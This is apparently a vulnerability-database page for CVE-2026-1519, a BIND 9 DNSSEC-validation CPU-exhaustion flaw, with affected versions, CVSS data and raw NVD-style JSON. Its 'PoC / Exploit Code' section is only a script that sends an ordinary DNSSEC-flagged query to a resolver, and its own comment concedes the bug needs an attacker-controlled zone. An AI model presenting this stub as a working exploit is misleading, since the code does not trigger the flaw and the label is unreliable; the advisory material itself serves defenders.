Security Vulnerability Report
中文
CVE-2026-1519 CVSS 7.5 HIGH

CVE-2026-1519

Published: 2026-03-25 14:16:33
Last Modified: 2026-05-21 15:24:02
Source: [email protected]

Description

If a BIND resolver is performing DNSSEC validation and encounters a maliciously crafted zone, the resolver may consume excessive CPU. Authoritative-only servers are generally unaffected, although there are circumstances where authoritative servers may make recursive queries (see: https://kb.isc.org/docs/why-does-my-authoritative-server-make-recursive-queries). This issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.46, 9.20.0 through 9.20.20, 9.21.0 through 9.21.19, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.46-S1, and 9.20.9-S1 through 9.20.20-S1.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:* - VULNERABLE
BIND 9.11.0 - 9.16.50
BIND 9.18.0 - 9.18.46
BIND 9.20.0 - 9.20.20
BIND 9.21.0 - 9.21.19
BIND 9.11.3-S1 - 9.16.50-S1
BIND 9.18.11-S1 - 9.18.46-S1
BIND 9.20.9-S1 - 9.20.20-S1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ PoC Concept for CVE-2026-1519 This script demonstrates how to send a DNS query with DNSSEC OK (DO) bit set to trigger DNSSEC validation on a target resolver. Note: Actual exploitation requires a maliciously crafted zone served by an authoritative name server controlled by the attacker. """ import dns.message import dns.query def trigger_poc(target_ip): # Create a DNS query with DNSSEC OK bit set query = dns.message.make_query('example.com', 'A') query.flags |= dns.flags.AD query.use_edns(edns=0, ednsflags=dns.flags.DO) try: # Send query to the target resolver response = dns.query.udp(query, target_ip, timeout=5) print(f"Query sent to {target_ip}, response received: {response.id}") print("Monitor target CPU usage for potential spike.") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": # Replace with the IP of the vulnerable BIND resolver target = "192.168.1.1" trigger_poc(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1519", "sourceIdentifier": "[email protected]", "published": "2026-03-25T14:16:33.110", "lastModified": "2026-05-21T15:24:01.930", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "If a BIND resolver is performing DNSSEC validation and encounters a maliciously crafted zone, the resolver may consume excessive CPU. Authoritative-only servers are generally unaffected, although there are circumstances where authoritative servers may make recursive queries (see: https://kb.isc.org/docs/why-does-my-authoritative-server-make-recursive-queries).\nThis issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.46, 9.20.0 through 9.20.20, 9.21.0 through 9.21.19, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.46-S1, and 9.20.9-S1 through 9.20.20-S1."}, {"lang": "es", "value": "Si un resolvedor BIND está realizando validación DNSSEC y encuentra una zona creada maliciosamente, el resolvedor puede consumir CPU excesiva. Los servidores solo autoritativos generalmente no se ven afectados, aunque hay circunstancias en las que los servidores autoritativos pueden realizar consultas recursivas (ver: https://kb.isc.org/docs/why-does-my-authoritative-server-make-recursive-queries).\nEste problema afecta a las versiones de BIND 9 9.11.0 a 9.16.50, 9.18.0 a 9.18.46, 9.20.0 a 9.20.20, 9.21.0 a 9.21.19, 9.11.3-S1 a 9.16.50-S1, 9.18.11-S1 a 9.18.46-S1, y 9.20.9-S1 a 9.20.20-S1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-606"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:*", "versionStartIncluding": "9.11.0", "versionEndIncluding": "9.16.50", "matchCriteriaId": "9EC5B9B1-25F2-48CA-9E8A-59D8E81D408A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:*", "versionStartIncluding": "9.18.0", "versionEndExcluding": "9.18.47", "matchCriteriaId": "4DC8EC77-8200-45EC-B006-73E48A67A1B8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:*", "versionStartIncluding": "9.20.0", "versionEndExcluding": "9.20.21", "matchCriteriaId": "2C0EF5D0-68A6-4E00-985B-523D9B243E49"}, {"vulnerable": true, "criteria": "cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:*", "versionStartIncluding": "9.21.0", "versionEndExcluding": "9.21.20", "matchCriteriaId": "B1DD0950-5CBD-49B2-8007-5E96B3C4FB1B"}]}]}], "references": [{"url": "https://downloads.isc.org/isc/bind9/9.18.47", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://downloads.isc.org/isc/bind9/9.20.21", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://downloads.isc.org/isc/bind9/9.21.20", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://kb.isc.org/docs/cve-2026-1519", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://lists.debian.org/debian-lts-announce/2026/04/msg00008.html", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Issue Tracking", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.